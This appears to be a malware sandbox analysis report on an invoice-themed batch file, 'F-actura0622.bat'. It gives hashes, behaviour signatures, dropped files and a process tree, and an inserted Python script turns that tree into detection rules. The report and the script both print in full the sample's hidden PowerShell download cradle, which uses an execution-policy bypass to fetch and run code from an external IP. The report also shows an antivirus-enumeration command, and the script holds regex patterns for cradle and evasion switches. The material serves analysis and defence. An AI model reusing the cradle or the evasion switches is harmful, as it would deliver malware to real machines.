Analysis

  • max time kernel
    961s
  • max time network
    963s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-06-2022 20:19

General

  • Target

    F-actura0622.bat

  • Size

    1KB

  • MD5

    6cef8304265178796921535f0a2e9c03

  • SHA1

    07275c43ac049126b967325baf984e3def7af1ed

  • SHA256

    db9c0fd3a144ea0a24d8d65841ae94f7336ed420428dd455ed4b27ac081949c5

  • SHA512

    1a2fa8832ed844fad8b704754f929df1ed71931f043571f3c0d9e6025ff821b0169c028f15062df10bb350668522e9f17af14a1dd81283c5222b01af974157f3

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 2 IoCs
  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\system32\chcp.com
        chcp
        3⤵
        PID:1904
    • C:\Windows\system32\chcp.com
      chcp 708
      2⤵
      PID:4072
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -noexit -windowstyle hidden "(new-object net.webclient).DownloadString('http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT') | iex"
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Windows\System32\Wbem\WMIC.exe
          "C:\Windows\System32\Wbem\WMIC.exe" /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct GET displayName /Format:List
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4520
        • C:\ProgramData\boACkwMt\naK.exe
          "C:\ProgramData\boACkwMt\naK.exe" "C:\ProgramData\boACkwMt\odJ"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Executes dropped EXE
          • Checks BIOS information in registry
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies Internet Explorer settings
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4676
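The process tree above is the detection surface: a .bat in the user's Temp directory spawns cmd.exe, which spawns a hidden PowerShell download cradle (-ep Bypass, -nop, -windowstyle hidden, DownloadString piped to iex), which in turn enumerates installed AV via WMIC and executes a dropped binary from C:\ProgramData. The script below is an added example, not part of the sandbox report: it reconstructs that tree from constructed process-creation events (JSON lines using Sysmon Event ID 1 field names, with the PIDs, images and command lines taken from the report; the root parent PID 5100 is invented) and applies the four rules an analyst would alert on.

```python
"""Detection rules for the execution chain in the process tree above.

Added example; not part of the sandbox report. SAMPLE_EVENTS is constructed
from the report's PIDs and command lines; the root ParentProcessId 5100 is
an assumption (the report does not show cmd.exe's parent).
"""
import json
import re
from collections import namedtuple

SAMPLE_EVENTS = r"""
{"ProcessId": 948, "ParentProcessId": 5100, "Image": "C:\\Windows\\system32\\cmd.exe", "CommandLine": "C:\\Windows\\system32\\cmd.exe /c \"C:\\Users\\Admin\\AppData\\Local\\Temp\\F-actura0622.bat\""}
{"ProcessId": 2920, "ParentProcessId": 948, "Image": "C:\\Windows\\system32\\cmd.exe", "CommandLine": "C:\\Windows\\system32\\cmd.exe /c chcp"}
{"ProcessId": 1904, "ParentProcessId": 2920, "Image": "C:\\Windows\\system32\\chcp.com", "CommandLine": "chcp"}
{"ProcessId": 4072, "ParentProcessId": 948, "Image": "C:\\Windows\\system32\\chcp.com", "CommandLine": "chcp 708"}
{"ProcessId": 712, "ParentProcessId": 948, "Image": "C:\\Windows\\system32\\cmd.exe", "CommandLine": "cmd /c \"\"C:\\Users\\Admin\\AppData\\Local\\Temp\\F-actura0622.bat\" \""}
{"ProcessId": 2316, "ParentProcessId": 712, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ep Bypass -nop -noexit -windowstyle hidden \"(new-object net.webclient).DownloadString('http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT') | iex\""}
{"ProcessId": 4520, "ParentProcessId": 2316, "Image": "C:\\Windows\\System32\\Wbem\\WMIC.exe", "CommandLine": "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct GET displayName /Format:List"}
{"ProcessId": 4676, "ParentProcessId": 2316, "Image": "C:\\ProgramData\\boACkwMt\\naK.exe", "CommandLine": "\"C:\\ProgramData\\boACkwMt\\naK.exe\" \"C:\\ProgramData\\boACkwMt\\odJ\""}
"""

Finding = namedtuple("Finding", "pid rule detail")

URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Download-and-execute primitives commonly seen in PowerShell cradles.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|invoke-expression|\biex\b",
    re.I)
# Switches that disable policy/profile or hide the window.
PS_EVASION = re.compile(
    r"-(?:ep|executionpolicy)\s+bypass|-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.I)
BAT_FROM_TEMP = re.compile(r"\\appdata\\local\\temp\\[^\"\s]+\.bat", re.I)
AV_ENUM = re.compile(r"securitycenter2.*antivirusproduct", re.I)


def parse_events(text):
    """Parse JSON lines into {pid: event}; blank lines are ignored."""
    events = {}
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            events[ev["ProcessId"]] = ev
    return events


def image_name(path):
    """'C:\\Windows\\System32\\Wbem\\WMIC.exe' -> 'wmic.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid up to the highest ancestor we hold an event for."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        chain.append(image_name(events[pid]["Image"]))
        pid = events[pid]["ParentProcessId"]
    return chain


def extract_urls(command_line):
    return URL_RE.findall(command_line)


def analyse(events):
    """Run every rule over every event and return the findings."""
    findings = []
    for pid, ev in events.items():
        img = image_name(ev["Image"])
        cmd = ev["CommandLine"]
        parents = ancestry(events, ev["ParentProcessId"])
        # Rule 1: cmd.exe running a .bat out of the user's Temp directory (the lure).
        if img == "cmd.exe" and BAT_FROM_TEMP.search(cmd):
            findings.append(Finding(pid, "bat_from_user_temp", cmd))
        # Rule 2: PowerShell download cradle combined with evasion switches.
        if img == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd) and PS_EVASION.search(cmd):
            findings.append(Finding(pid, "powershell_download_cradle", ";".join(extract_urls(cmd))))
        # Rule 3: WMIC asking SecurityCenter2 which AV products are installed.
        if img == "wmic.exe" and AV_ENUM.search(cmd):
            findings.append(Finding(pid, "av_product_enumeration", cmd))
        # Rule 4: a binary under C:\ProgramData with a PowerShell ancestor (dropped payload).
        if ev["Image"].lower().startswith("c:\\programdata\\") and "powershell.exe" in parents:
            findings.append(Finding(pid, "dropped_exe_under_programdata", ev["Image"]))
    return findings


if __name__ == "__main__":
    for f in analyse(parse_events(SAMPLE_EVENTS)):
        print(f"PID {f.pid:<5} {f.rule:<30} {f.detail}")
```

Rule 4 is the one that needs the tree rather than a single event: naK.exe's own command line is unremarkable, and it is only suspicious because its parent chain is powershell.exe, cmd.exe, cmd.exe. The URL pulled out by rule 2 matches the ps1.dropper URL in the Malware Config section, so the same extraction can feed a blocklist directly.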

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      • Persistence
        T1060 Registry Run Keys / Startup Folder (1 signature)

      • Defense Evasion
        T1497 Virtualization/Sandbox Evasion (1 signature)
        T1112 Modify Registry (2 signatures)

      • Discovery
        T1012 Query Registry (2 signatures)
        T1497 Virtualization/Sandbox Evasion (1 signature)
        T1082 System Information Discovery (2 signatures)

      Downloads

      • C:\ProgramData\boACkwMt\gcpfqzsczq.dop
        Filesize

        6.8MB

        MD5

        cb0e540176159268be4986459091576a

        SHA1

        c512c14e8a2afb15636e7b4c6f30284646b8d456

        SHA256

        fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4

        SHA512

        a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a

      • C:\ProgramData\boACkwMt\naK.exe
        Filesize

        884KB

        MD5

        4685811c853ceaebc991c3a8406694bf

        SHA1

        9cd382eb91bfea5782dd09f589a31b47c2c2b53e

        SHA256

        3242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4

        SHA512

        a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46

      • C:\ProgramData\boACkwMt\odJ
        Filesize

        178B

        MD5

        2c2d7336ea1206702663cfb74b74d0b9

        SHA1

        e5f610f63b5762104e7dbc2635b8485f267b96d1

        SHA256

        6589d846120ced6f77bda3b905ef0ff0c14947f31389481d1900a8958a19a49b

        SHA512

        9ae77c606fa3f3275da91954073b1f6b2dbddb4593463f80fc2ad42e4a07d366d353aa4530612470a66a78623f008d4c2134c6ea20a6a796374dc5e27776d024

      • memory/712-133-0x0000000000000000-mapping.dmp
      • memory/1904-131-0x0000000000000000-mapping.dmp
      • memory/2316-137-0x00000236EF4A0000-0x00000236EF4E4000-memory.dmp
        Filesize

        272KB

      • memory/2316-139-0x00000236F2E20000-0x00000236F35C6000-memory.dmp
        Filesize

        7.6MB

      • memory/2316-142-0x00000236F11B0000-0x00000236F1226000-memory.dmp
        Filesize

        472KB

      • memory/2316-143-0x00007FFD52380000-0x00007FFD52E41000-memory.dmp
        Filesize

        10.8MB

      • memory/2316-136-0x00007FFD52380000-0x00007FFD52E41000-memory.dmp
        Filesize

        10.8MB

      • memory/2316-135-0x00000236ECF00000-0x00000236ECF22000-memory.dmp
        Filesize

        136KB

      • memory/2316-134-0x0000000000000000-mapping.dmp
      • memory/2920-130-0x0000000000000000-mapping.dmp
      • memory/4072-132-0x0000000000000000-mapping.dmp
      • memory/4520-138-0x0000000000000000-mapping.dmp
      • memory/4676-149-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-148-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB

      • memory/4676-150-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-151-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-152-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-153-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-154-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-155-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-156-0x0000000004B10000-0x0000000005C07000-memory.dmp
        Filesize

        17.0MB

      • memory/4676-140-0x0000000000000000-mapping.dmp
      • memory/4676-158-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB

      • memory/4676-159-0x0000000077D30000-0x0000000077ED3000-memory.dmp
        Filesize

        1.6MB